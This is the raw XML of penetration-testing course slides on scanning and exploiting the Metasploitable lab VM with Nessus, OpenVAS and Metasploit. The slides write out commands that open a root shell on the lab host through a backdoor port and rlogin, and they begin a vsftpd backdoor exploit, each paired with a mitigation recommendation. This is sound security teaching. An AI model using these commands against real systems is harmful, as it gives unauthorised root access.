              <a:t>See previous lab for optional details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r>
              <a:rPr lang="en-US"/>
              <a:t>Perform a null scan against </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>metasploitable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1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Nessus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/>
              <a:t>Create a new advanced scan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Default configurations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Set IP address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 6" descr="手机屏幕截图&#10;&#10;已生成高可信度的说明">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE42CF99-46B7-4289-8BF8-4997D65D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81" y="1353119"/>
            <a:ext cx="4537261" cy="3092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06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5AEBBC-1516-4A4F-BE95-39E65B330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Nessus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 6" descr="手机屏幕截图&#10;&#10;已生成高可信度的说明">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C58E88C3-4160-4413-8DEC-786D73DA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6" y="860891"/>
            <a:ext cx="6699436" cy="34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8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A8500-60C7-45D4-B1DE-F5C2B4789E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OpenVAS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011FF-217A-4F53-9EE1-D4324C1C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Start a new scan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Go to Scan-&gt;Task</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Use the scan wizard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>scan 10.10.0.20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D2471-7306-4A2B-B417-774158E3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87" y="1088605"/>
            <a:ext cx="5302823" cy="3390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62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32CA6-7498-4828-9EE0-452A70983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OpenVAS Output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DD779-98F2-4D06-BC00-169CDF0FD6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You may have different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DEEEC-6191-4F16-971E-F6D8D2DB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00" y="1268372"/>
            <a:ext cx="6527400" cy="3799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48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Exploitable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As penetration testers, we have found vulnerabilities but we should attempt to exploit the most severe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Eliminate the false-positives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>We should also start to think about mitigations!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Our job isn't just hack to find vulnerabilities, we provide recommendations to help a client secure their own system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We can expand on our chart of vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Nessus can export as CSV and other formats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Even with just the nmap results, we can do a lot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Take a look at your list of open ports and services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Normally there will not be this many open ports and services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>It may be just as much though with 100+ hosts</a:t>
            </a:r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23" y="2386343"/>
            <a:ext cx="2056015" cy="1556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90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Owning Metasploitable</a:t>
            </a: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3536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Exploitation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Even though nmap and Nessus automated some of this for us, we should still take notes on everything we exploit and the steps we took</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Make a note in your chart on what you did and the outcome</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Make notes about vulnerability mitigation recommendations as well</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>This is a living document that we will update through out pen test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>It can be used and referenced to help write our report later</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>You can use Powerpoint, Word, Excel, OneNote, any tool of our choice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>I usually use combinations of notepad++, OneNote, Excel, and if applicable, a whiteboard</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="268924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Exploitable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As penetration testers, we have found vulnerabilities but we should attempt to exploit the most severe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Eliminate the false-positives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>We should also start to think about mitigations!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Our job isn't just hack to find vulnerabilities, we provide recommendations to help a client secure their own system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>We also focus on the highest risk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Risk = Ease of exploitation + Impact to system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We can expand on our chart of vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>OpenVAS/Nessus can export as CSV and other formats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>nmap to xml</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>xml to html, other parsers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>xml import into excel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Take a look at your list of open ports and services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Normally there will not be this many open ports and services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>It may be just as much though with 100+ hosts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78B9F-3122-42DD-8A40-86129A2842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Advanced Searching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A4732C-FAA9-4FEC-9B8F-141F9358E2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Advanced Searching</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>For searching, specifying two keywords works like an OR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>platform:linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>platform:unix</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>This will provide more results than if we search for just linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Specifying a keyword and then a string will work like an AND</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>name:java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Jenkins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>"java" would need to be in the Description</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>"Jenkins" would need to be anywhere in the "show info" long description</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>You can use REGEX too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3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Setup</a:t>
            </a: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2429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Warm up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/>
              <a:t>One of the ports is listening as a backdoor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It will dump you into a root terminal prompt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify this port and connect to it using our simple connection utility</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is a bind shell, ready and waiting for us!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There is also misconfiguration that may let you connect with another command, rlogin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Kali does not come with this tool by default. You will need to install it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>rlogin has been deprecated, very insecure and should use usually </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> instead</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>By downgrading </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>security on the client side (kali), we can talk to the old insecure service</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Reconnect to bridged/NAT networking, update IP if needed</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRP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sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> apt update</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRP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sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> apt install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>rsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>-client</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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4914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09979-A88D-44BD-BC0F-D8687C4D5D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0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Intentional Backdoor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188404"/>
            <a:ext cx="8572840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>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Use Netcat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>nc 10.10.0.20 1524</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Verified.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Recommendation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>What is causing this backdoor?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>On the target machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>netstat -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>tlpn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> | grep 1524</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1">
              <a:latin typeface="Consolas"/>
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The process is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>xinetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, recommend it is shut down and configured not to start </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4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248"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="583915" y="782442"/>
          <a:ext cx="7979772" cy="2785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756">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2039746217"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="633061">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="819641541"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="890864">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4079106494"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="857208">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="64913201"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5062883">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="447073264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tcp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open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shell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Metasploitable root shell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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="42720519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93" y="3716229"/>
            <a:ext cx="4674189" cy="43496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A8212A3-F387-4AF6-B62F-AE617A6A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46" y="1093881"/>
            <a:ext cx="3474720" cy="24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RSH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584644"/>
            <a:ext cx="8572840" cy="329215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800" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>rsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> is enabled! </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>This service allows connections over TCP 513</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>rlogin -l root 10.10.0.20</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>CVE-1999-0651</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>It is an old service</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>blindly trusts the remote machine</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>offers no security at all</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Recommendation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Disable it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Troubleshooting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Prompted for a password?? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rlogin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t> is actually using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>. Install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1"/>
              <a:t>rsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>-client.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27582"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="119199" y="761547"/>
          <a:ext cx="8516984" cy="7441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824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75680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50838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914917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403725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tcp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netkit-rsh rexecd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tcp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login?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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2211698856"/>
                  </a:ext>
                </a:extLst>
              </a:tr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514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err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>tcp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shell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Netkit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" u="none" strike="noStrike">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" u="none" strike="noStrike" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>rshd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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2754917340"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10FE0C39-7852-4D93-A56D-A55F891E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2237525"/>
            <a:ext cx="4130040" cy="18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Start Metasploit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There are more easy ways to own this VM, practice on your own</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>There are many possibilities here but they require research</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Start with port 21/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Reference your nmap version scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>You can try using Google to learn more about the service and version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>You can also try </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>metasploit's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> search feature</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Find the vulnerability with port 21 and exploit it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> for the exploit, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> it, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>show info </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>for your options, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exploit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3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14B5C-E25C-4E2B-9252-BF05C460CD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7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21/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>vsftpd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249364"/>
            <a:ext cx="8572840" cy="362743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800" err="1"/>
              <a:t>vsftpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> was backdoored!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050"/>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1"/>
              <a:t>search </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" err="1"/>
              <a:t>vsftpd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" b="1"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" err="1"/>
              <a:t>msf</a:t>
